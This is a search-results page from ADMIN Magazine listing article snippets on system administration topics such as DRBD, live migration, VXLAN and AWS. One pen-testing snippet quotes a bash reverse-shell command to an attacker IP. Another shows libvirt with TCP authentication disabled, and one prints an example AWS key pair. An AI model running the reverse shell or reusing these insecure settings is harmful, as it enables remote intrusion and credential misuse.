Admin Magazine
 
  • News
  •  
  • Articles
  •  
  • Tech Tools
  •  
  • Subscribe
  •  
  • Archive
  •  
  • Whitepapers
  •  
  • Write for Us!
  •  
  • Newsletter
  •  
  • Shop
  • DevOps
  • Cloud Computing
  • Virtualization
  • HPC
  • Linux
  • Windows
  • Security
  • Monitoring
  • Databases
  • all Topics...
Search
Login
ADMIN Magazine on Facebook
GooglePlus

Search

Refine your search
Sort order
  • Date
  • Score
Content type
  • Article (Print) (1267)
  • Article (320)
  • News (212)
  • Blog post (5)
Keywords
Creation time
  • Last day
  • Last week
  • Last month
  • Last three months
  • Last year

« Previous 1 ... 125 126 127 128 129 130 131 132 133 134 135 136 137 138 ... 181 Next »

9%
Create a high availability VM with  DRBD9  and Reactor
07.10.2025
Home »  Archive  »  2025  »  Issue 89: Autom...  » 
Photo by Emma Simpson on Unsplash
. Listing 1 DRBD Resource for VM # vi /etc/drbd.d/proxy.res resource proxy { device drbd0; disk /dev/drbd/proxy; meta-disk internal; on alice { address 10.42.0.100:7789; node-id 0
9%
Live Migration
18.02.2014
Home »  Articles  » 
that each Libvirt instance needs to open a TCP/IP socket. All you need are the following lines in /etc/libvirt/libvirtd.conf : listen_tls = 0 listen_tcp = 1 auth_tcp = "none" The configuration shown does
9%
Red Hat’s Cloud Tools
08.07.2013
Home »  Articles  » 
 
-party cloud technologies with the help of its Delta Cloud API. After all, CloudForms 1.1, DeltaCloud 1.0, Storage Server 2.0, JBoss Middleware, and Enterprise Virtualization 3.1 form the foundation
9%
Saving Storage Space with Reduced Precision
19.06.2023
Home »  HPC  »  Articles  » 
round to even Round to the nearest value, ties round away from zero Directed rounding toward 0 Directed rounding toward +infinity Directed rounding toward −infinity Converting from FP64
9%
Improved defense through pen testing
13.12.2018
Home »  Archive  »  2018  »  Issue 48: Secur...  » 
Lead Image Photo by Simeon Jacobson on Unsplash
with Computer A (the victim system) receiving the following code: $ bash -I <& /dev/tcp/10.0.0.1/444 0<&1 that causes Computer A to connect to Computer B (the attacking system that receives the connection from
9%
Layer 3 SDN
29.09.2020
Home »  Archive  »  2020  »  Issue 59: Custo...  » 
Lead Image © Kirsty Pargeter, 123RF.com
, Calico supports both OpenStack … © OpenStack, Apache-2.0 [2] Figure 2: … and Kubernetes, plus several other solutions. © Kubernetes, CC BY 4.0 [3
9%
Network overlay with VXLAN
06.10.2022
Home »  Archive  »  2022  »  Issue 71: Kuber...  » 
Photo by Fikri Rasyid on Unsplash
despite different locations and a Layer 3 underlay. An example of VXLAN as an overlay could be a virtual server system that is redundant and uses the virtual IPv4 address 192.0.2.1. The address
9%
Manage Windows Server storage with PowerShell
06.10.2022
Home »  Archive  »  2022  »  Issue 71: Kuber...  » 
Photo by Brian McGowan on Unsplash
this configuration step as early as possible: Add-WindowsFeature Multipath-IO $vid = 'MSFT2005' $pid = 'iSCSIBusType_0x9' New-MSDSMSupportedHW -VendorId $vid -ProductId $pid Set
9%
Optimizing Windows 10 for SSDs
22.12.2017
Home »  Archive  »  2017  »  Issue 42: Secur...  » 
Lead Image © Sergiy Serdyuk, 123RF.com
the data rate of the SSD. From the results, in megabytes per second (MBps), you can compute the I/O rate in operations per second (IOPS). The developer specifies the following formulas: Total result = 0
9%
Real World AWS for Everyone
18.02.2018
Home »  Archive  »  2018  »  Issue 43: Real...  » 
Photo by adrian on Unsplash
]. Create access key pairs for the required tenants/users. An AWS access key always has a key ID in the form of AKIAJ4 PMEXHFYUHIXG2A and a secret access key such as :/ONT0HapjmLw7xni 6FPscmvPZJ Sc75hUXAQI+N3

« Previous 1 ... 125 126 127 128 129 130 131 132 133 134 135 136 137 138 ... 181 Next »

Service

  • Article Code
  • Contact
  • Legal Notice
  • Privacy Policy
  • Glossary
    • Backup Test
© 2026 Linux New Media USA, LLC – Legal Notice